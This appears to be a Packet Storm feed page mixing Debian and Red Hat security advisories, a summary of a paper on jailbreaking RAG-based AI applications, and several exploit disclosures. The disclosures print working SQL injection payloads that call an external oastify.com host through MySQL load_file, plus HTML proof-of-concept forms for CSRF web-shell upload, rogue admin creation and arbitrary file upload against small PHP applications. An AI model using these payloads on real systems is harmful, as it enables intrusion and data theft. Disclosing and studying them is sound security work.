Proof of concept unauthenticated remote code execution exploit for Calibre versions 7.14.0 and below.

Calibre 7.14.0 Remote Code Execution

Veeam Backup and Replication version 12.1.2.172 unauthenticated remote code execution exploit.

Veeam Backup And Replication 12.1.2.172 Remote Code Execution

Whitepaper called Unleashing Worms and Extracting Data: Escalating the Outcome of Attacks against RAG-based Inference in Scale and Severity Using Jailbreaking. In this paper, the authors show that with the ability to jailbreak a GenAI model, attackers can escalate the outcome of attacks against RAG-based GenAI-powered applications in severity and scale.

Unleashing Worms And Extracting Data

Debian Linux Security Advisory 5769-1 - Multiple issues were found in Git, a fast, scalable, distributed revision control system, which may result in file overwrites outside the repository, arbitrary configuration injection or arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5769-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 13, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gitCVE ID         : CVE-2023-25652 CVE-2023-25815 CVE-2023-29007 CVE-2024-32002                 CVE-2024-32004 CVE-2024-32020 CVE-2024-32021 CVE-2024-32465Debian Bug     : 1034835 1071160Multiple issues were found in Git, a fast, scalable, distributedrevision control system, which may result in file overwrites outside therepository, arbitrary configuration injection or arbitrary codeexecution.For the stable distribution (bookworm), these problems have been fixed inversion 1:2.39.5-0+deb12u1.We recommend that you upgrade your git packages.For the detailed security status of git please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/gitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbklgFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0QD9RAAiN4YarOU7lbe6MnW4vRpz1qJA4ph8WgtqRs5GKgMUBOPcLCCqDim/9Ylvib6iaH/8WW5Rh9TDXY5BuWZ/Ek5zU9oDcde2E3r4VUJDKdSICjyBpooc5iLsJpTjh8lHio+UjrNqBqoLAtyarCsj1muvO8l/f96O6qotP/wUJVqZfAyCpHFeeApzj7MdXWNt/j5YBSiu7dwZY+p0E1cKwGglJtZnUCcyJaelnLd6Igu2Lq+4OvuhqWhsmeEaDauOY43WA7Qwpu814XJG9lrMAyWZJFWnT/NEGYi0dm2vhbZzoS4V/WvCmtfyrCJlkXzKgG737YMpI99T7eP75BhSF6dw8aC5HCT6cG5Gv1apEhVC2hMIVot3ZVL/7ojml972rjltmMMgILStR7N9JWrDqXPpn8SWslwjMLfxHslZzG3YGJV5ihXtvefWafH7c0X7WVT1yTdE1FrTOnCIUfPc/J+jEXMWNd+vsV3aHdVVdZoHj8bDso47CZqMYwTa2Q0opuv+4CDnuG1wUZzv4ap1w21C36tSwIZ1u8CEMhyYzdZV7TUf/0XsDNsms2ewRNmEWXHGvxsw1+wdTpFeb9iahoGTfcDPq3gdr4W74yRn5ZryREu6G2C0zGMaPkfyjGcnDiHTGsET2qxX5Je0iTsLraWbLAB0iyHmABzsDCn/pJc7lE==iG6s-----END PGP SIGNATURE-----

Debian Security Advisory 5769-1

Red Hat Security Advisory 2024-6667-03 - Red Hat OpenShift Dev Spaces 3.16 has been released.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6667.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift Dev Spaces 3.16.0 release  
Advisory ID:        RHSA-2024:6667-03  
Product:            Red Hat OpenShift Dev Spaces  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6667  
Issue date:         2024-09-14  
Revision:           03  
CVE Names:          CVE-2021-0341  
====================================================================

Summary: 

Red Hat OpenShift Dev Spaces 3.16 has been released.

All containers have been updated to include feature enhancements, bug fixes and CVE fixes.

Following the Red Hat Product Security standards this update is rated as having a security impact of Important. The Common Vulnerability Scoring System (CVSS) base score is available for every fixed CVE in the references section.

Description:

Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development.

The 3.16 release is based on Eclipse Che 7.90 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2.

Users still using the v1 standard should migrate as soon as possible.

https://devfile.io/docs/2.2.0/migrating-to-devfile-v2

Dev Spaces releases support the latest two OpenShift 4 EUS releases. Users are expected to update to newer OpenShift releases in order to continue to get Dev Spaces updates. 

https://access.redhat.com/support/policy/updates/openshift#crw

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-0341

References:

https://access.redhat.com/security/updates/classification/#important  
https://issues.redhat.com/browse/CRW-6868

Red Hat Security Advisory 2024-6667-03

Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi### Bonus: FU + RCE & XSS - Information disclosure## Author: nu11secur1ty## Date: 09/14/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.The payload '+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submittedin the password parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get all theinformation from the database of this system, and he can do very maliciousaction against the owner of this application!STATUS: HIGH- Vulnerability for deprecation!WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!https://github.com/oretnom23[+]Exploits:- SQLi Multiple:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT9033=9033 AND ('ehPW'='ehPW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw---```## Reproduce:[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)## Time spent:00:17:00

Ship Ferry Ticket Reservation System 1.0 SQL Injection

Reservation Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Reservation Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip                                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

  [+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New Menu</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Menu Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Category</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="cat" required="">  
                                                         <option value="9">Dessert</option>  
                                                        <option value="6">Main Course</option>  
                                                        <option value="7">Pasta</option>  
                                                        <option value="10">Rice</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Subcategory</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="subcat">  
                                                         <option>Drinks</option>  
                                                        <option>Lunch and Dinner</option>  
                                                        <option>Mirienda</option>  
                                                        <option>Non Combo Meal</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Description</label>  
                      <div class="col-lg-8">   
                        <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Price</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Image</label>  
                      <div class="col-lg-8">   
                        <input type="file" class="form-control" name="image" id="title">  
                      </div>  
                  </div> 

                    
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>

    [+] Ev!L : http://127.0.0.1/reservation/images/shopping.php

-----------[+] Part 02 Add Admin [+]-------------------

[+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New User</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Full Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="username">Username</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="password">Password</label>  
                      <div class="col-lg-8">   
                        <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">  
                      </div>  
                  </div> 

                                                                        
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Reservation Management System 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-6663-03 - An update for kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6663.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 security updateAdvisory ID:        RHSA-2024:6663-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6663Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2024-41090====================================================================Summary: An update for kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel.  This patch module is targeted for kernel-4.18.0-305.120.1.el8_4.Security Fix(es):* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-41090References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2299240https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-6663-03

Online Job Recruitment Portal Project version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code                           |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 10.

[+] Set the target site link Save changes and apply . 

[+] infected file : rec_detail.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Recruitment Form</title>  
</head>  
<body>  
    <h1>Recruitment Form</h1>  
    <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data">  
          
        <label for="photograph">Photograph:</label>  
        <input type="file" id="photograph" name="photograph" required><br><br>

          
        <label for="placeofbirth">Place of Birth:</label>  
        <input type="text" id="placeofbirth" name="placeofbirth" required><br><br>

          
        <label for="fhname">Father's/Husband's Name:</label>  
        <input type="text" id="fhname" name="fhname" required><br><br>

          
        <label for="marital_status">Marital Status:</label>  
        <select id="marital_status" name="marital_status">  
            <option value="single">Single</option>  
            <option value="married">Married</option>  
            <option value="divorced">Divorced</option>  
        </select><br><br>

          
        <label for="Nationality">Nationality:</label>  
        <select id="Nationality" name="Nationality">  
            <option value="national1">Nationality 1</option>  
            <option value="national2">Nationality 2</option>  
        </select><br><br>

          
        <label for="handicapped">Handicapped:</label>  
        <select id="handicapped" name="handicapped">  
            <option value="yes">Yes</option>  
            <option value="no">No</option>  
        </select><br><br>

          
        <label for="religion">Religion:</label>  
        <select id="religion" name="religion">  
            <option value="religion1">Religion 1</option>  
            <option value="religion2">Religion 2</option>  
        </select><br><br>

          
        <label for="blood">Blood Group:</label>  
        <select id="blood" name="blood">  
            <option value="A+">A+</option>  
            <option value="B+">B+</option>  
            <option value="AB+">AB+</option>  
            <option value="O+">O+</option>  
            <option value="O-">O-</option>  
        </select><br><br>

          
        <label for="mark">Identification Mark:</label>  
        <input type="text" id="mark" name="mark" required><br><br>

          
        <input type="submit" value="Submit">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/Recruitment-Portal-master/images/.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Job Recruitment Portal Project 1.0 Arbitrary File Upload

Red Hat Security Advisory 2024-6662-03 - An update for python-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6662.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-setuptools security updateAdvisory ID:        RHSA-2024:6662-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6662Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for python-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 7-ELS Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7-ELS/html/7-ELS_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Source

Packet Storm